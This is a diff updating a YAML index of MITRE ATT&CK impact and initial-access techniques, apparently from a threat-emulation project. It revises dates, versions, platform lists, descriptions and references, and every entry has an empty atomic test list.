+        url: https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html
+      - source_name: Trend Micro War of Crypto Miners
+        description: 'Oliveira, A., Fiser, D. (2020, September 10). War of Linux Cryptocurrency
+          Miners: A Battle for Resources. Retrieved April 6, 2021.'
+        url: https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1565:
     technique:
       modified: '2024-02-02T17:18:39.004Z'
@@ -58408,11 +59387,10 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1531:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:35:13.577Z'
       name: Account Access Removal
       description: "Adversaries may interrupt availability of system and network resources
         by inhibiting access to accounts utilized by legitimate users. Accounts may
@@ -58435,6 +59413,7 @@ impact:
         phase_name: impact
       x_mitre_contributors:
       - Hubert Mank
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Use process monitoring to monitor the execution and command line parameters of binaries involved in deleting accounts or changing passwords, such as use of [Net](https://attack.mitre.org/software/S0039). Windows event logs may also designate activity associated with an adversary's attempt to remove access to an account:
@@ -58452,9 +59431,10 @@ impact:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      x_mitre_version: '1.2'
+      - IaaS
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'User Account: User Account Modification'
@@ -58480,9 +59460,8 @@ impact:
         url: https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1531
     atomic_tests: []
   T1486:
@@ -58569,7 +59548,7 @@ impact:
         NHS Digital Egregor Nov 2020)\n\nIn cloud environments, storage objects within
         compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware
         Part 1)"
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-06-16T13:07:10.318Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Data Encrypted for Impact
       x_mitre_detection: |-
@@ -58593,12 +59572,11 @@ impact:
       - Availability
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1486
     atomic_tests: []
   T1499:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:56:47.424Z'
       name: Endpoint Denial of Service
       description: |
         Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
@@ -58617,7 +59595,6 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Alfredo Oliveira, Trend Micro
       - David Fiser, @anu4is, Trend Micro
@@ -58634,18 +59611,13 @@ impact:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
-      x_mitre_version: '1.1'
+      - IaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Flow'
@@ -58669,8 +59641,8 @@ impact:
       - source_name: FSISAC FraudNetDoS September 2012
         description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
           Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
-          Fraud. Retrieved April 18, 2019.
-        url: https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
+          Fraud. Retrieved September 23, 2024.
+        url: https://www.ic3.gov/Media/PDF/Y2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
       - source_name: ArsTechnica Great Firewall of China
         description: Goodin, D.. (2015, March 31). Massive denial-of-service attack
           on GitHub tied to Chinese government. Retrieved April 19, 2019.
@@ -58690,33 +59662,22 @@ impact:
         url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1496:
     technique:
-      modified: '2024-02-14T21:00:00.467Z'
+      modified: '2024-10-13T17:00:09.759Z'
       name: Resource Hijacking
       description: "Adversaries may leverage the resources of co-opted systems to
         complete resource-intensive tasks, which may impact system and/or hosted service
-        availability. \n\nOne common purpose for Resource Hijacking is to validate
-        transactions of cryptocurrency networks and earn virtual currency. Adversaries
-        may consume enough system resources to negatively impact and/or cause affected
-        machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood
-        Blog 2017) Servers and cloud-based systems are common targets because of the
-        high potential for available resources, but user endpoint systems may also
-        be compromised and used for Resource Hijacking and cryptocurrency mining.(Citation:
-        CloudSploit - Unused AWS Regions) Containerized environments may also be targeted
-        due to the ease of deployment via exposed APIs and the potential for scaling
-        mining activities by deploying or compromising multiple containers within
-        an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation:
-        Trend Micro Exposed Docker APIs)\n\nAdditionally, some cryptocurrency mining
-        malware identify then kill off processes for competing malware to ensure it’s
-        not competing for resources.(Citation: Trend Micro War of Crypto Miners)\n\nAdversaries
-        may also use malware that leverages a system's network bandwidth as part of
-        a botnet in order to facilitate [Network Denial of Service](https://attack.mitre.org/techniques/T1498)
-        campaigns and/or to seed malicious torrents.(Citation: GoBotKR) Alternatively,
-        they may engage in proxyjacking by selling use of the victims' network bandwidth
-        and IP address to proxyware services.(Citation: Sysdig Proxyjacking)"
+        availability. \n\nResource hijacking may take a number of different forms.
+        For example, adversaries may:\n\n* Leverage compute resources in order to
+        mine cryptocurrency\n* Sell network bandwidth to proxy networks\n* Generate
+        SMS traffic for profit\n* Abuse cloud-based messaging services to send large
+        quantities of spam messages\n\nIn some cases, adversaries may leverage multiple
+        types of Resource Hijacking at once.(Citation: Sysdig Cryptojacking Proxyjacking
+        2023)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
@@ -58727,7 +59688,7 @@ impact:
       - Magno Logan, @magnologan, Trend Micro
       - Vishwas Manral, McAfee
       - Yossi Weizman, Azure Defender Research Team
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: Consider monitoring process resource usage to determine anomalous
         activity associated with malicious hijacking of computer resources such as
@@ -58744,8 +59705,11 @@ impact:
       - Linux
       - macOS
       - Containers
-      x_mitre_version: '1.5'
+      - SaaS
+      x_mitre_version: '2.0'
       x_mitre_data_sources:
+      - 'Cloud Service: Cloud Service Modification'
+      - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
       - 'File: File Creation'
@@ -58764,99 +59728,73 @@ impact:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1496
         external_id: T1496
-      - source_name: Unit 42 Hildegard Malware
-        description: 'Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking
-          Malware Targeting Kubernetes. Retrieved April 5, 2021.'
-        url: https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
-      - source_name: CloudSploit - Unused AWS Regions
-        description: CloudSploit. (2019, June 8). The Danger of Unused AWS Regions.
-          Retrieved October 8, 2019.
-        url: https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc
-      - source_name: Sysdig Proxyjacking
-        description: Crystal Morin. (2023, April 4). Proxyjacking has Entered the
-          Chat. Retrieved July 6, 2023.
-        url: https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/
-      - source_name: Kaspersky Lazarus Under The Hood Blog 2017
-        description: GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April
-          17, 2019.
-        url: https://securelist.com/lazarus-under-the-hood/77908/
-      - source_name: Trend Micro Exposed Docker APIs
-        description: Oliveira, A. (2019, May 30). Infected Containers Target Docker
-          via Exposed APIs. Retrieved April 6, 2021.
-        url: https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html
-      - source_name: Trend Micro War of Crypto Miners
-        description: 'Oliveira, A., Fiser, D. (2020, September 10). War of Linux Cryptocurrency
-          Miners: A Battle for Resources. Retrieved April 6, 2021.'
-        url: https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html
-      - source_name: GoBotKR
-        description: Zuzana Hromcová. (2019, July 8). Malicious campaign targets South
-          Korean users with backdoor‑laced torrents. Retrieved March 31, 2022.
-        url: https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/
+      - source_name: Sysdig Cryptojacking Proxyjacking 2023
+        description: 'Miguel Hernandez. (2023, August 17). LABRAT: Stealthy Cryptojacking
+          and Proxyjacking Campaign Targeting GitLab . Retrieved September 25, 2024.'
+        url: https://sysdig.com/blog/labrat-cryptojacking-proxyjacking-campaign/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1496
     atomic_tests: []
   T1565.002:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6
-      created: '2020-03-02T14:27:00.693Z'
-      x_mitre_version: '1.1'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1565.002
-        url: https://attack.mitre.org/techniques/T1565/002
-      - source_name: DOJ Lazarus Sony 2018
-        url: https://www.justice.gov/opa/press-release/file/1092091/download
-        description: Department of Justice. (2018, September 6). Criminal Complaint
-          - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
-      - source_name: FireEye APT38 Oct 2018
-        url: https://content.fireeye.com/apt/rpt-apt38
-        description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
-          November 6, 2018.'
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-08-26T16:33:33.983Z'
+      name: Transmitted Data Manipulation
       description: |-
         Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
 
         Manipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Transmitted Data Manipulation
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detecting the manipulation of data as at passes over a network
         can be difficult without the appropriate tools. In some cases integrity verification
         checks, such as file hashing, may be used on critical files as they transit
         a network. With some critical processes involving transmission of data, manual
         or out-of-band integrity checking may be useful for identifying manipulated
         data. '
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: impact
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_impact_type:
       - Integrity
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6
+      created: '2020-03-02T14:27:00.693Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1565/002
+        external_id: T1565.002
+      - source_name: DOJ Lazarus Sony 2018
+        description: Department of Justice. (2018, September 6). Criminal Complaint
+          - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+        url: https://www.justice.gov/opa/press-release/file/1092091/download
+      - source_name: FireEye APT38 Oct 2018
+        description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
+          November 6, 2018.'
+        url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1485:
     technique:
-      modified: '2023-10-03T17:30:32.192Z'
+      modified: '2024-09-25T20:46:14.641Z'
       name: Data Destruction
       description: |-
         Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as <code>del</code> and <code>rm</code> often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.
@@ -58865,7 +59803,7 @@ impact:
 
         To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018).
 
-        In cloud environments, adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ  - Cisco Insider)
+        In cloud environments, adversaries may leverage access to delete cloud storage objects, machine images, database instances, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ  - Cisco Insider)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
@@ -58891,9 +59829,10 @@ impact:
       - Linux
       - macOS
       - Containers
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Snapshot: Snapshot Deletion'
+      - 'Cloud Storage: Cloud Storage Modification'
       - 'Process: Process Creation'
       - 'File: File Deletion'
       - 'Image: Image Deletion'
@@ -58949,55 +59888,11 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1485
     atomic_tests: []
   T1498:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
-      - Linux
-      - macOS
-      - Google Workspace
-      - Containers
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Yossi Weizman, Azure Defender Research Team
-      - Vishwas Manral, McAfee
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab
-      type: attack-pattern
-      created: '2019-04-17T20:23:15.105Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1498
-        url: https://attack.mitre.org/techniques/T1498
-      - source_name: FireEye OpPoisonedHandover February 2016
-        url: https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html
-        description: 'Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November
-          3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in
-          Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019.'
-      - source_name: FSISAC FraudNetDoS September 2012
-        url: https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
-        description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
-          Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
-          Fraud. Retrieved April 18, 2019.
-      - source_name: Symantec DDoS October 2014
-        url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
-        description: Wueest, C.. (2014, October 21). The continued rise of DDoS attacks.
-          Retrieved April 24, 2019.
-      - source_name: Cisco DoSdetectNetflow
-        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
-        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
-          Retrieved April 25, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T16:01:00.510Z'
       name: Network Denial of Service
       description: |-
         Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
@@ -59012,6 +59907,10 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_contributors:
+      - Yossi Weizman, Azure Defender Research Team
+      - Vishwas Manral, McAfee
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detection of Network DoS can sometimes be achieved before
         the traffic volume is sufficient to cause impact to the availability of the
         service, but such response time typically requires very aggressive monitoring
@@ -59024,16 +59923,52 @@ impact:
         may be small and the indicator of an event availability of the network or
         service drops. The analysis tools mentioned can then be used to determine
         the type of DoS causing the outage and help with remediation.'
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      - Containers
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Sensor Health: Host Status'
       x_mitre_impact_type:
       - Availability
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab
+      created: '2019-04-17T20:23:15.105Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1498
+        external_id: T1498
+      - source_name: Cisco DoSdetectNetflow
+        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+          Retrieved April 25, 2019.
+        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
+      - source_name: FSISAC FraudNetDoS September 2012
+        description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
+          Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
+          Fraud. Retrieved September 23, 2024.
+        url: https://www.ic3.gov/Media/PDF/Y2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
+      - source_name: FireEye OpPoisonedHandover February 2016
+        description: 'Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November
+          3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in
+          Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019.'
+        url: https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html
+      - source_name: Symantec DDoS October 2014
+        description: Wueest, C.. (2014, October 21). The continued rise of DDoS attacks.
+          Retrieved April 24, 2019.
+        url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1495:
     technique:
@@ -59101,11 +60036,10 @@ impact:
       - Availability
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1490:
     technique:
-      modified: '2024-04-12T02:30:08.379Z'
+      modified: '2024-09-24T13:27:31.881Z'
       name: Inhibit System Recovery
       description: |-
         Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options.
@@ -59123,7 +60057,7 @@ impact:
 
         On network devices, adversaries may leverage [Disk Wipe](https://attack.mitre.org/techniques/T1561) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations.
 
-        Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
+        Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, database backups, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
@@ -59150,7 +60084,7 @@ impact:
       - Network
       - IaaS
       - Containers
-      x_mitre_version: '1.4'
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Windows Registry: Windows Registry Key Modification'
@@ -59200,13 +60134,12 @@ impact:
         url: https://www.zdnet.com/article/ransomware-victims-thought-their-backups-were-safe-they-were-wrong/
       - source_name: disable_notif_synology_ransom
         description: TheDFIRReport. (2022, March 1). Disabling notifications on Synology
-          servers before ransom. Retrieved October 19, 2022.
-        url: https://twitter.com/TheDFIRReport/status/1498657590259109894
+          servers before ransom. Retrieved September 12, 2024.
+        url: https://x.com/TheDFIRReport/status/1498657590259109894
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1490
     atomic_tests: []
   T1561.001:
@@ -59274,11 +60207,10 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1529:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-22T20:45:22.531Z'
       name: System Shutdown/Reboot
       description: |-
         Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) (e.g. <code>reload</code>).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert_TA18_106A)
@@ -59343,13 +60275,12 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1529
     atomic_tests: []
 initial-access:
   T1133:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:36.318Z'
       name: External Remote Services
       description: |-
         Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)
@@ -59427,7 +60358,6 @@ initial-access:
         url: https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1133
     atomic_tests: []
   T1195.001:
@@ -59477,11 +60407,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1566.002:
     technique:
-      modified: '2024-04-15T23:51:25.037Z'
+      modified: '2024-10-15T16:06:32.591Z'
       name: 'Phishing: Spearphishing Link'
       description: |-
         Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.
@@ -59520,10 +60449,10 @@ initial-access:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '2.6'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Application Log: Application Log Content'
@@ -59540,7 +60469,7 @@ initial-access:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
       - source_name: CISA IDN ST05-016
         description: 'CISA. (2019, September 27). Security Tip (ST05-016): Understanding
           Internationalized Domain Names. Retrieved October 20, 2020.'
@@ -59579,12 +60508,11 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1566.002
     atomic_tests: []
   T1566.001:
     technique:
-      modified: '2024-01-31T14:09:27.066Z'
